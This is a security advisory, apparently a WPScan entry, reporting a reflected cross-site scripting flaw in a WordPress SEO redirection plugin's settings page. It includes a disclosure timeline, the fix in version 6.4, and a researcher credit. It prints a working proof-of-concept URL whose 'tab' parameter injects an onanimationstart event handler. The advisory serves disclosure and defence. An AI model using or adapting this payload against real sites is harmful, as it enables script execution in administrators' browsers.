The setting page of the plugin is vulnerable to reflected Cross-Site Scripting (XSS) as user input is not properly sanitised before being output in an attribute. Timeline (WPScanTeam) January 29th, 2021 - Report received & Confirmed & Escalated to WordPress plugins Team (who confirmed to have received the report) March 16th, 2021 - No updates, disclosing April 18th, 2021 - v6.4 released, fixing the issue
https://example.com/wp-admin/options-general.php?page=seo-redirection.php&tab=on%22style%3D%22animation-name%3Aspinner%22+onanimationstart%3D%22alert%28origin%29%22%3E Video: https://mega.nz/file/2kkH2ATT#Ip2SOS3ciG2QYVZp6ALyqGksAd6V-85rWPUFOmqUxUE
Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
Nguyen Anh Tien
Yes
2021-03-16 (about 2 years ago)
2021-03-16 (about 2 years ago)
2021-04-27 (about 2 years ago)